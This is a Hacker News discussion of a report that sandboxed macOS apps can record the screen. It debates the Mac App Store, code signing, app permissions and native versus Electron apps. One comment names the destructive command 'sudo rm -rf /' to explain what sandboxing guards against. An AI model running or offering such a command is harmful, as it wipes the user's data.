Hacker News new | comments | show | ask | jobs | submit login
Sandboxed Mac apps can record screen any time without you knowing (krausefx.com)
706 points by Sujan 9 months ago | hide | past | web | favorite | 232 comments



I was an AppKit engineer when the Mac app sandbox was introduced in 10.7. Much of our effort that release (and in following releases) was dedicated to making Mac features work within sandboxed apps. Think open and save panels, copy and paste, drag and drop, Services menu, Open Recents, etc.

We did our best but the fact is that sandboxed apps run more slowly, have fewer features, are more isolated, and take longer to develop. Sometimes this cost is prohibitive (see Coda 2.5).

IMO the app sandbox was a grievous strategic mistake for the Mac. Cocoa-based Mac apps are rapidly being eaten by web apps and Electron psuedo-desktop apps. For Mac apps to survive, they must capitalize on their strengths: superior performance, better system integration, better dev experience, more features, and higher general quality.

But the app sandbox strikes at all of those. In return it offers security inferior to a web app, as this post illustrates. The price is far too high and the benefits too little.

IMO Apple should drop the Mac app sandbox altogether (though continue to sandbox system services, which is totally sensible, and maybe retain something geared towards browsers.) The code signing requirements and dev cert revocation, which has been successfully used to remotely disable malware, will be sufficient security: the Mac community is good at sussing out bad actors. But force Mac devs to castrate their apps even more, and there won't be anything left to protect.


Not having a sandbox was acceptable in the 80s and 90s, when the software development community was reasonably trustworthy.

The software developers and software companies of today are on average not to be trusted: they will outright steal the customers' private information and sell it or give it away without a second thought.

Absent adequate laws, the success of the iOS permissions model and the complete failure of the Android permission model in protecting customers is perhaps the clearest proof of what a sandbox can achieve. I am reasonably sure that I can download an iOS app - any app - and that my private information will remain secure.

The platforms of today must offer a secure, privacy-preserving running environment. The free for all is dead, and it has been killed by greedy devs and companies.


Apple's implementation of sandboxing actually makes computer users less secure. All the good software is distributed away from the App Store, because sandboxed apps are far too limited (especially regarding the filesystem).

So users have been trained to not use the App Store, where apps have to go through an approval process, and instead to install software from the wild west of random websites.

The fact is that Macs are not phones, the iMac Pro costs six thousand dollars, and expecting users to use the crippled selection of software from the App Store is unworkable. Nobody pays six thousand dollars to play candy crush.


The App Store wasn't made for the 1000 people with iMac Pros. It's made for millions of average Joes who just want to use their computer without having to worry about ransomware.

You are definitely not in that crowd, but most Mac users definitely are. Frankly, until the App Store came out, they were all terrified of installing anything on their computer without some well known brand attached to it (e.g. Microsoft, Google, Adobe).

The App Store has been a great way for Apple to turn a demographic who was traditionally scared of installing apps into a new market.

> So users have been trained to not use the App Store

Again, you and I have been trained. Most users crap their pants when they see anything happed contrary to the "blessed path."


Mac App Store is a fascinating topic! It seems to be a product nearly abandoned by Apple (not much improvement in years since the first release, unless you count sandboxing as one.) User experience is poor (takes seconds to load pages, also the HTML-based buttons need to be clicked multiple times and/or downloads get stuck). Abandonware/copies of copies of copies of "free PDF Reader"-type software from developers who re-publish 300+ apps of questionable quality abound.


Yes the App Store app is so broken and abandoned that it seems far more sketchy than downloading software from a website, which is quite an achievement!


You're being ridiculous. The AppStore is one of the safest ways available to install software.


what value is "safe" if your choices are all extremely limited in what they can do? And if you think you can't get malware past apple screening you're not thinking creatively enough.


It works fine for me, I don't have to hunt for updates to all sorts of apps, pay only one company and have some extra security from the sandbox. Lots of awesome apps are available on the store.

I don't want to allow any app free access to the file system. And anyway, developers have found creative solutions to this problem also. E.g: by asking the user to open the target location from the app they can circumvent the protection.

The AppStore has its negative sides too: apps can disappear and be replaced by v2, forcing one to pay again and again.


The AppStore is terrible because its doesn't help developers, so they avoid it.

I'd LOVE to offer my app on the AppStore, but its too expensive and too restrictive.

A lot more awesome apps are available outside the AppStore.


> Apple's implementation of sandboxing actually makes computer users less secure. All the good software is distributed away from the App Store, because sandboxed apps are far too limited (especially regarding the filesystem).

Nonsense. The vast majority of users don't need software that does wacky stuff with the file system. They need software that opens documents they made, which all software in the app store can do. I'm a pro (the kind that currently owns the Mac Pro and will likely own the next one or the iMac Pro next), and I basically avoid all software that's not from the App Store. Your ranting sounds delusional to me.


> The vast majority of users don't need software that does wacky stuff with the file system.

Its not about "wacky stuff" its about basic things. Apps in the AppStore are horribly crippled compared to their not AppStore counterparts.

I'm a pro, and like many other pros, basically avoid all software from the AppStore.


> Nonsense. The vast majority of users don't need software that does wacky stuff with the file system.

Uhhhh, what? You're justifying a company you PAID thousands of dollars to remain in control of your device? We're fighting this sort of inane thoughts where these ideas are already executed. Look up John Deere, and the Freedom to Fix.

> They need software that opens documents they made, which all software in the app store can do. I'm a pro (the kind that currently owns the Mac Pro and will likely own the next one or the iMac Pro next), and I basically avoid all software that's not from the App Store.

Ok. You can choose to or not to.

> Your ranting sounds delusional to me.

You're calling someone else delusional for calling bullshit on Apple's faux-security? And you're calling for the app-ification of all computers? The person calling bullshit on Apple-faux-security isn't the delusional one here.


“You're justifying a company you PAID thousands of dollars to remain in control of your device?“

This is the bit that you FOSS diehards don’t get. Nobody really cares. What they want is something that they can switch on and go to Facebook or edit their documents on. They don’t want to tinker with kernel exstentions or run servers. For most, computing appliances are far more convenient.


Nobody really cares? You know, we're on this forum called hackernews?

You might want to pack up that opinion and take it to some place called "consumernews" or something (they might call it "productnews" these days). That is where nobody really cares.

While most of the "FOSS diehards" get it just fine. People want convenience. It's not that hard to understand and you're making yourself look like a fool if that's your claim. Doesn't mean convenience is the right way forward, even if people want it or don't care.

Since when is "people don't care" a viable argument for anything, the people that don't care, don't understand this.


“Since when is "people don't care" a viable argument for anything, the people that don't care, don't understand this.”

So climb down from your ivory tower and make them understand without reverting the usual rhetoric as you have done here.


> Nobody pays six thousand dollars to play candy crush.

You would be surprised.


The fact is that Macs are not phones, the iMac Pro costs six thousand dollars, and expecting users to use the crippled selection of software from the App Store is unworkable.

Keep in mind that professional users that buy the iMac Pro use pro apps, like AutoCAD, Final Cut, Logic, ProTools, Creative Suite and the like; these apps are mission-critical to their workflows and are not crippled.


> The software developers and software companies of today are on average not to be trusted: they will outright steal the customers' private information and sell it or give it away without a second thought.

This is an 'unintended side effect' of the software-as-a-service model. When software was licensed the software itself was what made the money, and there was no way that someone would buy a piece of software if it did not at least try to keep the data safe, in one piece and on the users' computer. But with software-as-a-service the user expects to see their data moving elsewhere and once that has happened all bets are off on how it can - and will - be monetized.


I agree that the idea of a sandbox and Mac App Store is still a vision worth continuing. The problem is that like macOS itself, it seems to have been sidelined for the past few years in favor of iOS and other endeavors.

The performance and limitations can definitely be improved, if not eliminated, if Apple focused on it. The question is: Will they?


> The free for all is dead, and it has been killed by greedy devs and companies.

I agree with you but think there should be more emphasis on connectivity.

In the 80's and 90's (less so of course in the 90's) if you got a computer virus it was probably from sharing software ... on a floppy disk. I used a Mac during those decades and like other software viruses were rare on that platform. :-/

The internet changed everything. Not only does the internet serve up compromised software it provides the back-channel so the malware can phone home.

I don't have any suggestions or any sort of panacea. It's nice sometimes just to reflect on how computing used to be. Back before passwords, sandboxes....


I agree, it's terrible. As a user, I often go to pains to avoid getting the App Store version of an app, if an alternative exists, because those apps are crippled to such a degree that they aren't worth using.

If I'm using the App Store stuff, then my text editor can't edit all my files, my video player can't open videos when I double-click them, my Evernote can't print to PDF, my disk usage analyzer can't analyze my disk because it can't ask me for authorization to do so, and so on.

At the same time, though, in theory I do want sandboxing, at least by default. I do want to have to explicitly authorize some random app before it can install a printer system extension, or before it can scan my entire disk.

I feel like the problem is more political/cultural: Apple prioritizes their low-information, low-computer-literacy users (hi, Dad!) so dearly, that they aren't willing to expend resources to find any compromise for their technically proficient ones. And through the sandboxing requirements, they force their third-party developers to either tell their power users to fuck off, or to give up on the App Store.

Or, I don't know, perhaps they just don't have enough engineers left for the Mac after moving so many of them to their higher-volume Candy Crush console business.

Regardless, though, if there were mechanisms for the user to control the sandboxing enforcement to a greater degree, I would be all for it.

If we could tell our Macs "yes, dude, I hereby authorize DaisyDisk to see all the files" and "Computer, hey bud do me a favor, overrule this restriction that says CotEditor can't ask me to authorize modifying root-owned files", then I would actually not only be happy with, but even prefer, the App Store versions.

But we can't, and it's sad.


I feel completely the same.

The problem though, if you allow for user overrides, then the next TotallyNotShadyVideoPlayer will kindly ask you to add the manual override for "can't read the screen" and, if you agree, it'll steal your credentials. That is, regular users will be easy to selfpwn.

I don't think this can be solved on the software side. It's "security vs. usefulness, pick one" kind of situation. Maybe we need to tackle the human factor - make it easier to prosecute malicious code authors - but not sure if that's any more possible to implement than software that's both useful and secure.


Yep, that's what I meant: Apple's stance is, We can't let veidr override sandbox limitations, because then his dad might get pwned.

That's true, as far as it goes. My view is, maybe you make the dialog to do that scary enough; maybe you have to go enable some security setting to even make the dialog possible; maybe, even so, you have to accept that some users like my dad will get fooled and exploited.

OTOH, it's already a slippery slope; even more secure would be to completely prohibit all third-party software entirely.

I think they are drawing the lines wrong.


History shows that if the dialog shows up often enough people will simply hit accept/ok/whatever without reading what it is about.


> maybe you have to go enable some security setting to even make the dialog possible

This sounds like you're on the right track. Make it a shell command you have to execute with SIP disabled.


> If I'm using the App Store stuff, then my text editor can't edit all my files, my video player can't open videos when I double-click them, my Evernote can't print to PDF, my disk usage analyzer can't analyze my disk because it can't ask me for authorization to do so, and so on.

I fail to see how the macOS sandbox prevents this. Disk usage analyser can ask you for disk access, sandboxed video players can surely open files double clicked in Finder, sandboxed apps can print to PDF.

A few example: QuickTime Player is sandboxed, Pages is sandboxed.


> I fail to see how the macOS sandbox prevents this

I think you might be thinking of the reasonable sandbox we wish we had, not the one we have.

https://daisydiskapp.com/manual/4/en/Topics/Editions.html

(Apple's own apps do not have to follow the rules that third-party apps do.)


Ok, that's a limitation. What about the other ones you described? I wrote a bunch of sandboxed app, and it's good enough for a document based app (when working on a single document).


The sandbox allows apps to open files via three methods:

* Open dialogs

* A limited number of files that have been opened in the past via open dialogs (intended for e.g. recent files)

* Files that live in the app's sandboxed region of the filesystem.

That's it. So your text editor can't open ~/.bash_profile unless it pops up an open dialog and asks you to manually click it.


How exactly is that a problem? You can open an open file dialog that is in the user's home directory and you can even select ".bash_profile" for them. All they have to do is click "OK" to start editing it. This gives them the security that your app can't just go and erase or overwrite or add malicious stuff to their .bash_profile without their consent, which seems like a really good idea!


Which is a good thing for most users, just not the power users that would potentially want their editor to open ~/.bash_profile (although the downside is that if they were allowed to do so, they could do so silently as well... which is the problem Apple is trying to solve for).


I'm a bit confused - if I explicitly want my text editor to open ~/.bash_profile, then I need to tell it that, which I would do through the Open dialog for GUI apps (or as a command line parameter for command line apps); and if I don't explicitly want to do so, then it probably shouldn't be opening it behind my back.

This sandboxing would be a problem with editors that naturally work with multi-file projects (e.g. an IDE where you'd want to open a whole Java project of linked files), but in the text editor scenario this limitation seems to make sense.


Those examples don't make any sense. All of them are possible within sandbox except perhaps the disk usage analyser.


> Evernote can't print to PDF

Yes it can. The print dialog has a whole PDF menu.


Ugh, sorry, my bad; this one, I misstated. I meant that Evernote (App Store version) isn't allowed to have the "Save PDF to Evernote" feature.

That feature is very useful, though; it can save anything, from any app that can print, to Evernote.


That's not true either. You can definitely save PDF in Evernote on the Mac (btw, there's only the App Store version of Evernote if your discount the web version).

To save PDF into Evernote on the Mac:

- if it's a file- use the share option (right click>Share>Evernote) - if it's in a browser- in Safari click on share (top right hand corner of the browser) > Evernote. If it's in Chrome, AFAIK, you have to use Evernote Web Clipper (extension) which is also available for Safari. - Of course, you can also copy/paste or drag and drop PDF into Evernote


I am talking about the feature whereby any app that can print can print directly to Evernote, as a PDF. This feature is very useful, though web clipper and the Sharing extension offer workarounds for some applications.

Screenshot: https://www.dropbox.com/s/xt4xqcr4lp1tpvh/Screenshot%202018-...


I personally am happy with subscription based applications in the App Store. I feel more confident that Apple will manage my credit card information better than unknown application developer.


I'm a big fan of desktop sandboxing, so thanks for the hard work. I dreaded running the unsandboxed Office:mac 2011 with its constant stream of "critical" security updates. That was definitely my worst experience using native apps.

On the other hand, I am not sure that code signing has been an all-around success. It seems to make life harder for the long tail of one-off apps and open source ports. And bad actors are only blacklisted after they've been caught. https://panic.com/blog/stolen-source-code/ - related: https://github.com/HandBrake/HandBrake/issues/619

I think I would prefer a security model were you could just download and start any .app, but upon first opening it, a dialog would inform you about its code-signing author and the permissions that the app has (with striking red/green color coding). Because right now, there is no way to tell which apps even use sandboxing without opening Activity Monitor, and there is no incentive for non-App-Store-apps to use sandboxing. (There is a dialog when opening a downloaded app for the first time, but it's grey and boring and not helpful at all.)


The only thing required to get a Developer ID signing certificate is a valid credit card (and I guess is not so hard o stole one) Tranmission malware was signed, Eltima Player malware was signed.

I agree with the need of a better first launch dialog.


Yes, many developers sign, and then fail to offer a secure way of verifying that the signature belongs to them.

But it's still better than nothing, I'm sure they would offer unsigned HTTP downloads if Apple didn't force them to get their shit together.


If the burden for authentication is on the developers anyway, then code-signing shouldn't require a 99€/year subscription. 99€ is a sum that doesn't help Apple, doesn't hinder criminals, but causes headaches for open-source projects and casual developers.


Yeah, Apple could do a better job authenticating public companies, by publishing the company name, address, etc associated with a certificate.

This would solve most of my complaints.


It does strike me as something that is very difficult to retrofit.

I'm not sure Apple should give up on it though, I don't want any old application I download to be able to read through the spreadsheets in my Accounting folder.

Perhaps the emergence of Electron is a wake up call for Apple and Microsoft, there is clearly a demand for creating applications with web technologies, OS developers need to respond to that rather than letting a third party eat their lunch.


It's a hard UI problem. The Mac sandbox overcorrects to requiring capability resources for all file accesses, while on the other extreme we have e.g. Windows UAC which trains users to roll their eyes and click through.

But Apple doesn't enjoy the luxury of solving this problem in a nuanced way, because Mac apps are not acting from a position of strength. I suspect you aren't downloading lots of Mac apps today, and the reason is not insufficient sandboxing, but instead the limited selection, annoying install experience, etc. These are the problems that Apple must fix first.

> Perhaps the emergence of Electron is a wake up call for Apple and Microsoft, there is clearly a demand for creating applications with web technologies

34 years ago, the Mac was new and generated developer excitement. But Apple was afraid the Mac would be dragged down via shitty DOS ports of apps like e.g. WordPerfect. Apple's response was to set a high bar via first-party "killer apps" like MacWrite, which would embarrass any such DOS ports. It worked: the Mac set the desktop publishing standard for years, decades even, and arguably still dominates.

Yes, there's a demand for developing apps with web technologies, but embracing that is a losing strategy for Apple. Why should I buy a Mac to run web apps that run equally well on a Chinese Chromebook? That's ceding any software advantage.

Instead Apple should leverage the Mac's unique software strengths. Aggressively evolve the Mac's unique "UI vocabulary" and application frameworks. Empower, not punish, the dedicated and passionate developer community. Ship love to the userbase (perhaps the only one in existence) that's willing to open their wallets for high-quality desktop software. And yes, tolerate web-tech apps too - but embarrass them!


Can you elaborate on the "annoying install experience?" I find that is completely opposite, most apps are drag and drop install (and finish their set ups on first launch, if any). Others are a very simple to click through installer. I find the installation experience to be much more .. annoying in windows sometimes. In OS X most apps are installed by dragging and dropping (well, not even required) to /Applications (usually by a folder aliased right to the right of it) and getting a "Installation Progress" in the form of how long it takes to copy data to the disk out of a compressed dmg. In Windows, most installers I run into still do the near straight run to 99%, then sit there for however long the actual installation took, or circles back 15 times.


I believe they are saying installing from the Mac App Store is an annoying experience, which I agree. It’s an inexplicably slow and clunky piece of garbage. It’s almost impressive how bad it is for a “first party” application.


That's because the Mac App Store was spawned from iTunes, which has to be the shittiest piece of garbage to ever stain the hard disks of Macs.


Best case, installing a non-MAS app involves downloading and extracting a zip file, mounting and then copying from a disk image, and then clicking through the "application downloaded from the Internet!" dialog.

Yes it's still much better than the typical Windows installer experience, but zero-install web apps are now setting the bar.


We're not talking about simple, zero install web apps here. We're mostly talking about Electron apps, which are "web apps" but still downloaded in the traditional sense though.


From a developer stand, why advantages do I get from making a native Mac app compared to a web app or an Electron app?

Web apps in the browser are OS-Agonstic and Electron apps can be easily made cross-platform.


The answer is quality. As a Mac user I always prefer a native Mac app to some cross-platform app, even one with nominally more features.

More specifically:

1. Superior performance. Native apps are just faster. They launch faster. They use an order of magnitude less memory. Multithreading via GCD is much much nicer than Web Workers. Large files are better supported. You can have very large tables. etc.

2. They properly implement Mac UI idioms. By comparison even the nicest Electron-like app (VSCode) violates many longstanding expectations: it doesn't properly highlight the menu bar when typing a key equivalent, menu items don't disable properly, the text highlight color is wrong, text selection anchors incorrectly, no column selection, text drag and drop is badly broken, undo doesn't know what it's undoing, undo coalesces incorrectly, hell even arrow keys sometimes go the wrong way. It's an island app doing its own thing.

The theory of the Mac is to establish a set of UI conventions. When you launched a new app, you would already know how to use most of it, because it was a Mac app. It looks and behaves like other apps, so you feel at home already. And as a developer, you get the right behavior now and in the future, for free.

But if every developer builds a cross-platform app with a custom framework and appearance and behavior and UI, then the OS loses its role in defining the platform conventions. In that event, what's the point in having more than one OS?


I fully agree with you. I love 3rd party Mac apps that look and act like Mac apps (Like Sequel Pro) but you still didn't answer my question.

From a developer point of view, it's just better to make a Web App or a Electron App that will be used by everyone irregardless of their OS. Not only it's less of a hassle to develop but also guarantees that more people are gonna use it.


I doubt that Web Workers vs. GCD makes a difference in user-visible performance. Parallelism matters more for domains that are the responsibility of the platform: image decoding, media playback, vector graphics, etc. (Web browser engines are starting to run away from the Mac system libraries in some of these areas, by the way: Skia and even Cairo/Pixman significantly outperform Core Graphics in many cases at this point, for instance.)

I'd also argue that VS Code isn't much worse off than most native code editors. Most code editors outside of Xcode don't use NSTextView and so have to implement all of the behavior themselves anyhow. For example, as far as I'm aware Sublime Text pretty much implements just as much of the core editing logic as VS Code does.

I'm not denying your complaints, of course--they're valid--but I don't think the gap between native and Web/Electron is as big as you're implying.


3.native is easier to develop (swift vs javascript, cocoa vs dom) and has a more robust result.


Don't know where this is coming from because in my experience developing for the web is much easier. There is tons of up to date documentation out there.

Whereas developing Mac apps seems to rely on a set of arcane knowledge and having been in the scene for years. The documentation for AppKit is vastly outdated and there is almost no blogging/tutorials scene so as a newbie you are basically going to be going through a lot of trial and error.

And then most of the documentation you will find is in ObjC while everyone around you is telling you to develop in Swift, but then Swift changes every few months. You open up a project from a few months ago, it doesn't compile anymore, and you basically have to work at Apple or be a dev god to fix it.

So.... native is easier to develop for? No way.


The trade-off is that they’re much shittier to use. Faster to develop, worse experience.

That’s an okay decision to make if it fits your product and market needs, but it’s important not to forget the cost.

Native apps perform better, integrate better with other system services, are more power efficient, use less storage space… usually technically superior in every way, with the exception that that are less portable and in some cases more time consuming to build.


So, they are more work for developers, but are technically superior for users (native UI, performance, battery life, etc.)


One way to isolate applications, common for server daemons, is to run them under their own user. The real "human" user can sudo into any application account, and does so on application execution. Marketing would have to rename things and slap a GUI over the feature, but I don't see why it wouldn't work for arbitrary Cocoa apps. (And the screen-capture API should be limited to capturing parts of the screen the application is currently drawing to, with overlaps clipped out, etc.)


That's clearly not viable, as displayed in the linked article. One of the examples of a good use for this was 1Password reading QR codes from a browser. Additionally, how would screen capture software work?


So if I argue that Clojure is a great language, you'd reject that claim because you can't write drivers in it. Got it.


I think this is really flawed logic. Sandboxing adds some development cost, sure, but the implication here ("grievous strategic mistake") is that it's the key reason developers are building web apps instead of native Mac apps. That just defies common sense.

Clearly the key reason Mac apps cost so much to develop is the platform-specific codebase they require. Mac apps have little in common even with iOS apps, so it's a huge cost. Against that baseline, adding sandbox entitlements is an extremely minor incremental cost.

It's not like eliminating the sandbox would drop the cost of Mac apps by some huge factor. Developers are writing web apps because they can use a cross-platform codebase, plain and simple. That's why I am much more optimistic about the rumor that Apple will lower the delta between Mac and iOS codebases, letting devs leverage their iOS investments. There will always be a cost to adapting a touch-based app to the desktop, but there's orders of magnitude more efficiency to be gained there than in blowing away a whole layer of the security model.


One thing I quite liked about the sandbox is running marginally (un)trusted code either interactively or as part of some process, and for that sandbox-exec(1) is great. Security best comes in layers and it's a worthy addition to the toolbox.

It's used by homebrew[0] during the build steps, I hear it's in progress for Nix, and I may make use of it in the future for archmac. Unfortunately it's been marked as deprecated in the man page:

    SANDBOX-EXEC(1)           BSD General Commands Manual          SANDBOX-EXEC(1)
    
    NAME
         sandbox-exec -- execute within a sandbox (DEPRECATED)

[0]: https://github.com/Homebrew/brew/blob/master/Library/Homebre...


The rumor is that Apple wants to unify the iphone, ipad and mac platforms [1]. So my guess is that they will keep the sandboxed apps because ios apps are also highly sandboxed.

[1] https://www.bloomberg.com/news/articles/2017-12-20/apple-is-...


I'm not sure Cocoa's dev experience is a plus right now though - isn't Marzipan intended to fix that?

I mean, you were on the AppKit team, so I don't think I need to list out the oddities/issues/etc it's currently got. Just curious if the general attitude in Apple was akin to "it's fine", or "we know it needs work, but we'll get there eventually".


Mac Cocoa dev has been evolving slowly and incrementally due to the small team size and strong backwards compatibility culture. It's fallen behind as a result. But fundamentally a platform-specific API and toolset can move much faster than a standards-limited web API.

That said it's easy to overextend yourself, as Microsoft demonstrated with their API treadmill. The art of engineering is to set the right evolutionary pace.

Your question is very good, and above my pay grade. In 2013 I had lots of opinions about how ObjC was evolving too slowly, and I was floored the next year when Swift (a well-kept secret within Apple) was unveiled. Apple is full of surprises, even to its own employees.


I don't disagree re: the pace, but I think it's important to note that when it's really just Electron (Chrome) that people are shoving everywhere, it's not _really_ a standards-limited web API... it's whatever Google opts to give them. Electron is sadly the first really approachable "build your app in a virtual machine and it'll just work" approach.

Anyway, not looking to derail the discussion, just wanted to say thanks for commenting - wasn't sure if anyone ex-Apple would be comfortable doing so.


I really don't think shrugging and giving up on security for desktop apps is a viable path.

> their strengths: superior performance, better system integration, better dev experience, more features, and higher general quality

These are important, but you generally do not want to sacrifice security to get them. The sandbox is opt-in on the Mac so where you have an app you believe cannot live in it, you have that choice. Saying Mac devs are forced to castrate their apps isn't accurate or fair.


Thanks for you effort. I prefer Mac app store apps, when they're at parity with non-store releases, because there's fewer licenses to install and manage (even if they all go in my password manager), and because I can upgrade all the app store apps at one go instead of being nagged by each one separately.


As an old person my assumption is that a desktop app can basically do whatever it wants with the screen, mouse, keyboard, or audio while it's actually running.

Isn't that what apps are for? This just seems like expected behavior. If you don't want apps doing stuff don't run them on your desktop computer.


I agree. This feels to me to be more like inducing paranoia to push some hidden agenda. The "open" design is a feature, not a bug, and why mobile apps and their isolated design only encourage silo'd data and horribly wasteful workarounds (upload something from one app into some distant third-party cloud service, and download it again for another app to access it... provided those two apps' developers have explicitly decided to provide such a feature.)

Every binary I run could delete all my data or steal my passwords or whatever else. That's not something to be afraid of --- it's something to cherish and be proud of[1], and it's why you don't run anything you don't trust. This "free-for-all" sharing and access encourages the sort of ad-hoc and unpremeditated interactions which are beneficial to the software ecosystem as a whole.

I usually have a magnifier, color identifier, and clipboard-listening-translator running. None of those would be easily implementable or may not even exist, had computers started out as locked-down systems from the beginning.

[1]https://boingboing.net/2012/08/23/civilwar.html


There's a difference between locked-down-by-Apple and locked-by-you according to your own choices (e.g. Qubes). Being able to run software from others without being completely vulnerable to them is essential to that open ecosystem we want. A free-for-all OS is like a meatspace without private property -- it can work at a small scale.


The data siloing on iOS is a UI decision, not a sandboxing decision. They decided most people simply don't understand filesystems (probably based on all the people they've seen who just save their files in the default directory, or the desktop, or the recycle bin(!) and then can't find them)

In the macOS sandbox, an app can access any old file, but only ones the user has implicitly told the app it can access - through the system "open file" dialog, double-clicking, drag & drop, etc.


iOS was never meant to handle files, imo.

It was meant as a souped up iPod platform, tethered to iTunes.

I just wish we didn't have to way for Windows 8/10 to get "sane" file management on tablets, after Google mangled Android from 3.1 onwards.


A design that dooms even savvy users to being compromised is simply not acceptable anymore. Most people are not discriminating enough about the software they install. But okay, maybe you actually are and never make mistakes[1]. But is all the software you use signed? By a certificate traceable to a real, accountable person? Can a software update, perhaps released by someone who has hacked the original developer, come along and turn it into malware? Because all of your apps have full-capabilities, it can now do things that you would never grant if explicitly asked.

Now you're completely screwed. All of your emails, pictures, medical information, other embarrassing personal information/media, bank logins, and so forth are compromised. Maybe you have two-factor authentication for all of your accounts (doubtful), but who cares? It can just read the memory of your browser process, quietly wait for you to login to the various services, and then hijack your sessions in the background.

So tell me: how in the world is this an acceptable situation?

[1] I sure hope you never use any of these new-school package managers for various programming languages, text editors, and such. You know, the ones that grab the latest commit from GitHub repositories run by total strangers and then run them with full privileges.


Even if it’s signed software, the sandbox is a useful layer in limiting the scope of any vulnerabilities it has. Say a media player has a bug in its decoder that allows a malicious video file to make the player execute arbitrary code. If the program is sandboxed, they shouldn’t be able to pivot from that into stealing your ssh keys or recording your screen.


> So tell me: how in the world is this an acceptable situation?

It is benefit vs cost: for me it is acceptable because i want to be able to do whatever i want with my computer using applications that can freely interact with each other without the OS getting in my way. I want the underlying system to provide the functionality for the applications to perform their tasks but not add unnecessary barriers that make features practically impossible.

Also FWIW personally as a developer i highly dislike the idea of signed software. First of all i do not like the idea of having to ask (let alone pay) anyone to have my program be runnable by others and second i do not like the idea of my name being carried alongside my programs unless i explicitly add it.


It is benefit vs cost: for me it is acceptable because i want to be able to do whatever i want with my computer using applications that can freely interact with each other without the OS getting in my way.

It is not the eighties anymore. Software is exploited through malicious files that exploit vulnerabilities in file readers (e.g. malicious PDFs). Software distribution sites get compromised (Handbrake, Transmission, Linux Mint), etc. Signatures and proper sandboxing reduce the attach service considerably.

Also, to address your point: sandboxing does not have to be binary. For instance, on macOS, a sandboxed app can request the user access to the calendar or address book. In that way some random app can't just steal your address book. [1] By default an application cannot open any files from the user's home directory, unless the user e.g. choses it using a file opening dialog (which runs out-of-process). On Flatpak on Linux, you as a user can decide to run an application with more entitlements (AFAIK currently only through the command-line).

We need to go to a world where the power lies with the user and not the developer to decide what an app can access, upload, etc. macOS sandboxing and Flatpaks on Linux are now providing part of that solution.

Also FWIW personally as a developer i highly dislike the idea of signed software. First of all i do not like the idea of having to ask (let alone pay) anyone to have my program be runnable by others

Flatpaks on Linux are normally signed, but they can be signed using GnuPG key. No need to pay or ask permission. Of course, the downside of this model is that it puts the burden on the user to check that the key is owned by a reputable person.

second i do not like the idea of my name being carried alongside my programs unless i explicitly add it

Most users should not want to run a program by a random person.

[1] Don't say that free software is not vulnerable to such problems. A popular free software documentation browser embeds a Google Ad, some open source applications use Google Analytics. I do not want to upload any data to Google. Unfortunately, as a user, I can only avoid that by inspecting all my outgoing connections. Of course, this is out of the reach of a normal user. I would absolutely be in favor of sandboxes where by default an app could not make any network connection.


> We need to go to a world where the power lies with the user and not the developer to decide what an app can access, upload, etc. macOS sandboxing and Flatpaks on Linux are now providing part of that solution. [..] Flatpaks on Linux are normally signed, but they can be signed using GnuPG key. No need to pay or ask permission. Of course, the downside of this model is that it puts the burden on the user to check that the key is owned by a reputable person.

I do not see those as placing power in the hands of the user, i see it more as placing power in the hands of the platform holder the developer develops for and the user uses. The user should be able to do whatever he pleases, even at the cost of the developer's wishes and to do this, the platform must allow the user to subvert both the platform's restrictions and the program's requests.

Anything that doesn't put the user in a position of utmost authority and trust is not something that places powers in the hands of the user.


“Most users should not want to run a program by a random person.”

This is demonstrably not true. Most users will go out of their way to run any software if they believe that it will do what they’re looking for.


I think the emphasis is supposed to be on the ‘should’. That is, it’s not in the user’s rational interests to run such software. Hence the locked down security model all the platforms are moving toward.


As the peer poster commenter points out, I said 'should' (as in: ought), I am not describing the factual situation.


Everything you install from the core debian stable repositories, is pretty much guaranteed to not have any actively malicious code. Otherwise it would be discovered and removed. All debian packages are signed by the package-upload process. It's not perfect, but it's been good enough so far. This is a world that is now niche, but used to be practical!

It's very depressing to be transitioning into a world where you can't use a small trusted open-source mail client and IM client etc, where you have to install crazy huge untrusted piles of flaky and inefficient code in order to interact with real-world people and institutions, and you can't easily control which version you have installed, and mobile devices become obsolete after just 3 years. (Even iPhones - not because of Apple, but because Instagram and Snapchat got too heavy/shitty for the older models! This does not happen for communication over SMTP or XMPP!)

So I see the "we need super sandboxes around every little thing" as a sort of bandaid on a much bigger problem which is not going to be fixed in the foreseeable future.


Like the XScreenSaver time bomb that caused a nag screen to pop up on April 1 one or two years ago on peoples screens? Debian distributed this code for years without realizing because no one even glanced at the code. The developer didn't even try to hide the time bomb, he even provided angry comments why he added the code.

The only reason Debian didn't distribute some really bad malicious code (that we know of) yet is because they got lucky and no developer tried to mess with them.


You’re assuming all Debian packages are secure. Like wlesieutre said in a sibling comment, software from a trusted source can and often does have vulnerabilities.


The sandbox is designed to make that not expected behavior - even if, as demonstrated here, it has holes…


Since when ? OSX has never outlawed this sort of thing.

The sandbox has always been completely different from iOS e.g. it doesn't ask permission to access photos, microphone, webcam.


Wrong.

1) Your webcam turns a light on. Not permission, but you know what's going on.

2) "People must grant permission for an app to access personal information, including the current location, calendar, contact information, reminders, and photos."

https://developer.apple.com/macos/human-interface-guidelines...


Those are if you are using the APIs directly.

But you can always go straight to the files themselves for cases like Photos and Calendars and also to the SQLite databases that back a lot of user data.

And current location is easy to get on OSX. You can simply look up the user's IP address and WiFi networks to triangulate the user's location with about the same accuracy as Apple can do.

With webcam you can easily switch the camera on, take the photo and switch it off. Could easily trick people into thinking it was a hardware fault rather than something nefarious with the app.

The fact is that none of what I listed above is possible on iOS.


That stuff is not possible if you have a sandboxed app from the Mac App Store.

Sure, if you download software from the web, it can do whatever it pleases.

But if you download apps only from the Mac App store, you should be safe.

On iOS, Apple checks all your software. On the Mac, they give you a choice: If you want "safe" software, go to the Mac App Store. If you want any software, go somewhere else.

The sandbox isn't as complete as on iOS, but the stuff you listed requires special permissions and confirmations when you get your software from the Mac App Store.


Aren’t the files outside of your app inaccessible from within the Sandbox, unless you give the app permission to read them? I mostly use non Mac App Store apps but one I use, the Unarchiver, needs permission to open files


If my webcam light ever flickered on and then off, I'm chucking my laptop off the side of a bridge. Willing to be most other people wouldn't attribute it to a hardware fault, either.


You could just cover it with a post-it instead of chucking it off a bridge.

The thing that bugs me is there’s no indication an app is connected to my microphone.


Thing is, at that point I'd be worried about the mic as well, as you point out.

Better safe than sorry!


Touché


Sandboxing isn't to prevent people from damaging their own computer (i.e., the "sudo rm -rf /" case), it's to impose a ceiling on how much damage can be done by an exploited process that the user doesn't realize has been exploited. It's not to save you from yourself, it's to save you from stuff that you wouldn't otherwise have any way of knowing was even happening. Sandboxing restrictions are more like using asserts in your code than anything else- they only stop programs from doing things that the programs themselves are stating that they would never attempt to do.
